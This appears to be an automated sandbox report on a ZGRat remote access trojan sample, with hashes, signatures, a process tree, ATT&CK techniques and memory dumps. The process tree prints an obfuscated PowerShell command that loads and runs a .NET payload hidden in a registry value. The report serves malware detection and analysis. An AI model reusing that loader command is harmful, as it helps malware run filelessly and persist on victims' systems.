Analysis

  • max time kernel
    150s
  • max time network
    40s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    15-05-2024 02:06

General

  • Target

    fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe

  • Size

    4.5MB

  • MD5

    96422a2b982c99614d31dff7f2b64680

  • SHA1

    e8f25aa518b0ef54bcdf770479ef28dd99dd8efc

  • SHA256

    fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16

  • SHA512

    882beba69a0ab2d6f7d048ecb4666b9ba4fe3ea17387ece13fb5bd589ce0db4d7343fbce6e2d836192aed2a920aae4edd1f4b6fa090fe807d54e024dbc234de9

  • SSDEEP

    24576:Epu+lTdASQBeSbtpO2+RZ8XK5OG/wS4gIVnxff9t+oQ9GXiqgbaaz2ub2UbRdL/h:EX

Malware Config

Signatures

  • Detect ZGRat V1 34 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{2f4d8f4e-d101-48a3-86b4-b2d39ac2b4d1}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:688
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:476
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:600
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k RPCSS
            2⤵
              PID:676
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
              2⤵
              • Modifies security service
              PID:756
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
              2⤵
                PID:808
                • C:\Windows\system32\Dwm.exe
                  "C:\Windows\system32\Dwm.exe"
                  3⤵
                    PID:1156
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs
                  2⤵
                    PID:852
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {D177B0E7-D93F-4474-B4CE-28ECEAFE67BE} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2884
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+'A'+'R'+'E'+'').GetValue(''+[Char](36)+'77'+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        4⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1456
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:964
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:112
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:348
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                          2⤵
                            PID:1068
                          • C:\Windows\system32\taskhost.exe
                            "taskhost.exe"
                            2⤵
                              PID:1108
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                              2⤵
                                PID:2260
                              • C:\Windows\system32\sppsvc.exe
                                C:\Windows\system32\sppsvc.exe
                                2⤵
                                  PID:2324
                              • C:\Windows\system32\lsass.exe
                                C:\Windows\system32\lsass.exe
                                1⤵
                                  PID:488
                                • C:\Windows\system32\lsm.exe
                                  C:\Windows\system32\lsm.exe
                                  1⤵
                                    PID:496
                                  • C:\Windows\Explorer.EXE
                                    C:\Windows\Explorer.EXE
                                    1⤵
                                      PID:1188
                                      • C:\Users\Admin\AppData\Local\Temp\fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe
                                        "C:\Users\Admin\AppData\Local\Temp\fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16.exe"
                                        2⤵
                                        • Drops startup file
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:2008
                                        • C:\Users\Admin\AppData\Local\Temp\$7749d3b0
                                          "C:\Users\Admin\AppData\Local\Temp\$7749d3b0"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:2204
                                        • C:\Users\Admin\AppData\Local\Temp\$775fe9b8
                                          "C:\Users\Admin\AppData\Local\Temp\$775fe9b8"
                                          3⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          PID:288

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v13

                                    Persistence

                                    Create or Modify System Process

                                    1
                                    T1543

                                    Windows Service

                                    1
                                    T1543.003

                                    Boot or Logon Autostart Execution

                                    1
                                    T1547

                                    Registry Run Keys / Startup Folder

                                    1
                                    T1547.001

                                    Privilege Escalation

                                    Create or Modify System Process

                                    1
                                    T1543

                                    Windows Service

                                    1
                                    T1543.003

                                    Boot or Logon Autostart Execution

                                    1
                                    T1547

                                    Registry Run Keys / Startup Folder

                                    1
                                    T1547.001

                                    Defense Evasion

                                    Modify Registry

                                    2
                                    T1112

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • \Users\Admin\AppData\Local\Temp\$7749d3b0
                                      Filesize

                                      4.5MB

                                      MD5

                                      96422a2b982c99614d31dff7f2b64680

                                      SHA1

                                      e8f25aa518b0ef54bcdf770479ef28dd99dd8efc

                                      SHA256

                                      fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16

                                      SHA512

                                      882beba69a0ab2d6f7d048ecb4666b9ba4fe3ea17387ece13fb5bd589ce0db4d7343fbce6e2d836192aed2a920aae4edd1f4b6fa090fe807d54e024dbc234de9

                                    • memory/1456-5051-0x000007FEF4CF0000-0x000007FEF568D000-memory.dmp
                                      Filesize

                                      9.6MB

                                    • memory/1456-4945-0x00000000012A0000-0x00000000012CA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1456-4916-0x0000000000980000-0x0000000000988000-memory.dmp
                                      Filesize

                                      32KB

                                    • memory/1456-4915-0x000007FEF4CF0000-0x000007FEF568D000-memory.dmp
                                      Filesize

                                      9.6MB

                                    • memory/1456-4914-0x0000000019FD0000-0x000000001A2B2000-memory.dmp
                                      Filesize

                                      2.9MB

                                    • memory/1456-4913-0x000007FEF4CF0000-0x000007FEF568D000-memory.dmp
                                      Filesize

                                      9.6MB

                                    • memory/1456-4912-0x000007FEF4CF0000-0x000007FEF568D000-memory.dmp
                                      Filesize

                                      9.6MB

                                    • memory/1456-4911-0x000007FEF4CF0000-0x000007FEF568D000-memory.dmp
                                      Filesize

                                      9.6MB

                                    • memory/1456-4910-0x000007FEF4FAE000-0x000007FEF4FAF000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2008-48-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-4886-0x0000000073FB0000-0x000000007469E000-memory.dmp
                                      Filesize

                                      6.9MB

                                    • memory/2008-20-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-16-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-4-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-26-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-28-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-30-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-32-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-66-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-64-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-62-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-60-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-58-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-56-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-54-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-52-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-50-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-0-0x0000000073FBE000-0x0000000073FBF000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2008-4884-0x00000000004F0000-0x000000000053C000-memory.dmp
                                      Filesize

                                      304KB

                                    • memory/2008-4883-0x00000000048E0000-0x000000000495E000-memory.dmp
                                      Filesize

                                      504KB

                                    • memory/2008-46-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-44-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-24-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-4885-0x0000000073FB0000-0x000000007469E000-memory.dmp
                                      Filesize

                                      6.9MB

                                    • memory/2008-42-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-40-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-38-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-36-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-34-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-4887-0x0000000073FBE000-0x0000000073FBF000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2008-4888-0x0000000073FB0000-0x000000007469E000-memory.dmp
                                      Filesize

                                      6.9MB

                                    • memory/2008-4889-0x0000000073FB0000-0x000000007469E000-memory.dmp
                                      Filesize

                                      6.9MB

                                    • memory/2008-22-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-1-0x0000000000C40000-0x00000000010C6000-memory.dmp
                                      Filesize

                                      4.5MB

                                    • memory/2008-18-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-14-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-12-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-10-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-8-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-3-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-6-0x0000000005FE0000-0x000000000621A000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2008-4917-0x0000000000B90000-0x0000000000BE4000-memory.dmp
                                      Filesize

                                      336KB

                                    • memory/2008-4944-0x0000000073FB0000-0x000000007469E000-memory.dmp
                                      Filesize

                                      6.9MB

                                    • memory/2008-2-0x0000000005FE0000-0x0000000006220000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/2204-4909-0x0000000000400000-0x000000000042B000-memory.dmp
                                      Filesize

                                      172KB